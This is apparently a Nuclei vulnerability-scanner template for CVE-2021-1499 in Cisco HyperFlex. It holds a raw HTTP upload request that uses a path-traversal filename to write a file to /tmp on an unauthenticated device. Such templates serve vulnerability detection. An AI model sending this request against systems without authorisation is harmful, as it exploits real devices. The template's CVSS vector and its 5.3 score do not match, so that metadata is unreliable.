id: CVE-2021-1499

info:
  name: Cisco HyperFlex HX Data Platform - File Upload Vulnerability
  author: gy741
  severity: medium
  description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user.
  reference:
    - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-1499
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 5.3
    cve-id: CVE-2021-1499
    cwe-id: CWE-306
  tags: cve,cve2021,cisco,fileupload,intrusive


requests:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583
        Origin: {{RootURL}}
        Referer: {{RootURL}}

        -----------------------------253855577425106594691130420583
        Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"
        Content-Type: application/json

        MyPasswdNewData->/api/tomcat

        -----------------------------253855577425106594691130420583--

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "application/json"
        part: header

      - type: word
        words:
          - '{"result":'
          - '"filename:'
          - '/tmp/passwd9'
        condition: and